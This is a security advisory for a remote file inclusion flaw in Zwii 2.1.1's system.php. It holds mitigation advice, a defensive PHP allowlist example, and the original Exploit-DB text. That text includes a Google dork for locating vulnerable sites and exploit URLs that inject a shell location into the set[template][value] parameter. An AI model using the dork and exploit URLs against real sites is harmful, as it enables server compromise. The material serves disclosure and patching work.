Vendor: Zwii
Author: Abdi Mohamed
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote File Inclusion
CWE: 98
Product Name: Zwii
Affected Version From: 2.1.2001
Affected Version To: 2.1.2001
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu, CentOS
Year: 2011

Zwii v 2.1.1 Remote File Include Vulnerability

Zwii v 2.1.1 is vulnerable to Remote File Inclusion. The flaw is in system.php, which builds an include path from $set["template"]["value"] (./templates/<value>/info.php). When system.php is requested directly, $set is not populated from the settings file and, if PHP's register_globals is enabled, is taken from the request instead. An attacker can therefore place a URL in the set[template][value] parameter and have the remote file fetched, included and executed on the vulnerable server.

Mitigation:

To mitigate this vulnerability, the application should initialise $set from its own settings file rather than from request data, and validate the template name against the set of installed templates before using it in an include path. Additionally, the application should be configured to include files only from a trusted local source (for PHP, this means disabling allow_url_include and register_globals).
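The following is an added example of the allowlisted include described above; it is not Zwii's code. It assumes a templates/<name>/info.php layout and builds a temporary templates directory as a constructed fixture so it runs stand-alone.

```php
<?php
// Added example, not Zwii's code: allowlisted template include that replaces
// include("./templates/" . $set["template"]["value"] . "/info.php").
declare(strict_types=1);

// Resolve templates/<name>/info.php, or return null unless $name is the plain
// directory name of a template that is actually installed.
function resolveTemplateInfo(string $templatesDir, string $name): ?string
{
    // 1. Shape check: a bare directory name. Rejects URLs, "..", slashes and NUL bytes.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }
    // 2. Allowlist: the name must match a template directory that exists on disk.
    $installed = array_map('basename', glob($templatesDir . '/*', GLOB_ONLYDIR) ?: []);
    if (!in_array($name, $installed, true)) {
        return null;
    }
    // 3. Canonicalise and confirm the file still lies inside the templates directory.
    $base = realpath($templatesDir);
    $info = realpath($templatesDir . '/' . $name . '/info.php');
    if ($base === false || $info === false
        || strncmp($info, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $info;
}

// Constructed fixture: a temporary templates directory holding one installed template.
$tmp = sys_get_temp_dir() . '/tpl_demo_' . bin2hex(random_bytes(4));
mkdir($tmp . '/default', 0700, true);
file_put_contents($tmp . '/default/info.php', "<?php\n\$templateName = 'default';\n");

$cases = [
    'default'                        => true,   // installed template: accepted
    'http://example.com/remote.php'  => false,  // remote URL, the advisory's vector
    '../../system/data/settings.php' => false,  // traversal out of templates/
    'missing'                        => false,  // well-formed but not installed
];
foreach ($cases as $input => $expectAccepted) {
    assert((resolveTemplateInfo($tmp, $input) !== null) === $expectAccepted);
}

// Hardened inclusion: $set comes from the settings file only, never from the request.
$set  = ['template' => ['value' => 'default']];   // stands in for what settings.php defines
$info = resolveTemplateInfo($tmp, $set['template']['value']);
if ($info === null) {
    exit("Unknown template configuration\n");
}
include $info;
echo "Loaded template: {$templateName}\n";
```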

Exploit-DB raw data:

# Exploit Title: Zwii v 2.1.1 Remote file include vulnerability
# Google Dork: Propulsé par Zwii 2.1.1
# Date: 08/01/2011
# Author: Abdi Mohamed
# Software Link: http://scripts.toocharger.com/fiches/scripts/zwii/5147.htm
# Version: v 2.1.1
# Tested on: ubuntu + centos
# Email : abdimohamed@hotmail.fr - mrabdimohamed@gmail.com
#######################################################

File: system.php
http://localhost/y/system/system.php

Code:

// Import the database
include("./system/data/settings.php");
include("./system/data/articles.php");
include("./system/data/accounts.php");
include("./system/data/positions.php");
include("./system/data/ip.php");
include("./templates/". $set["template"]["value"] ."/info.php");

Exploit:
http://localhost/y/system/system.php?set=(your shell)
http://localhost/y/system/system.php?set[template][value]=(your shell)

#######################################################
# Gr33tz : meher assel - xa7m3d - yahya idriss - houssem jrad - all Tunisian hackers
# Gr33tz : all member | v4-team.com - sec-war.com - hacktn.com
#######################################################